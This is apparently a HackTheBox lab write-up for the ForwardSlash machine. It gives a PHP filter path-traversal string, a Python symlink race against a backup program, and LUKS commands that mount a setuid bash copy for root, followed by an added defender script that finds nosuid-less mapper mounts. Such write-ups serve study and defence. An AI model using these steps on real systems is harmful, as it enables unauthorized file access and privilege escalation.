ForwardSlash @ HackTheBox
ForwardSlash is a 40-point Linux machine on HackTheBox. We use a path traversal vulnerability to get SSH credentials and abuse a custom backup program to read an old configuration file. For root, we mount a custom LUKS image that contains a setuid program.
Notes
PHP Filter
php://filter/convert.base64-encode/resource=dev/index.php
Backup Tool
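import hashlib
import os
import time

# The symlink is named after the MD5 of the current HH:MM:SS timestamp
m = hashlib.md5()
m.update(time.strftime("%H:%M:%S").encode())
# Link that name to the target file, then run the backup tool
os.system('ln -s /home/pain/user.txt ' + m.hexdigest())
os.system('/usr/bin/backup')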
LUKS Local
dd if=/dev/zero of=/tmp/vol bs=1M count=64
sudo cryptsetup -vy luksFormat /tmp/vol
sudo cryptsetup luksOpen /tmp/vol vol
sudo mkfs.ext4 /dev/mapper/vol
sudo mount /dev/mapper/vol /mnt
scp pain@forwardslash.htb:/bin/bash .
cp bash /mnt/bash; chmod u+s /mnt/bash
sudo umount /mnt && sudo cryptsetup luksClose vol
scp /tmp/vol pain@forwardslash.htb:/tmp/vol
LUKS Remote
sudo cryptsetup luksOpen /tmp/vol backup
cd
mkdir mnt
sudo /bin/mount /dev/mapper/backup ./mnt/
cd mnt; ./bash -p
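A defender-side check for the root step above, as an added example that is not part of the original post: it lists device-mapper mounts that lack the nosuid option, the mount option that makes the kernel ignore setuid bits such as the one set on the bash copy. The function names and the sample mount table are constructed for illustration.

```shell
#!/bin/sh
# Added example: list device-mapper mounts that still honour setuid bits.
# Input is a file in /proc/mounts format:
#   device mountpoint fstype options dump pass

# Print "device mountpoint" for every /dev/mapper/* mount whose
# option list does not contain nosuid. Defaults to /proc/mounts.
find_suid_mapper_mounts() {
    awk '
        $1 ~ /^\/dev\/mapper\// {
            n = split($4, opts, ",")
            nosuid = 0
            for (i = 1; i <= n; i++)
                if (opts[i] == "nosuid") nosuid = 1
            if (!nosuid) print $1, $2
        }
    ' "${1:-/proc/mounts}"
}

# Constructed sample table (not captured from the target machine).
write_sample_mounts() {
    cat > "$1" <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
/dev/mapper/backup /home/pain/mnt ext4 rw,relatime 0 0
/dev/mapper/vault /srv/vault ext4 rw,nosuid,nodev,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
EOF
}

# Demo run on the constructed table: only the mount without nosuid is reported.
sample=$(mktemp)
write_sample_mounts "$sample"
find_suid_mapper_mounts "$sample"
rm -f "$sample"
```

Called with no argument, find_suid_mapper_mounts reads the live /proc/mounts instead of the sample file.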
This post is licensed under CC BY 4.0 by the author.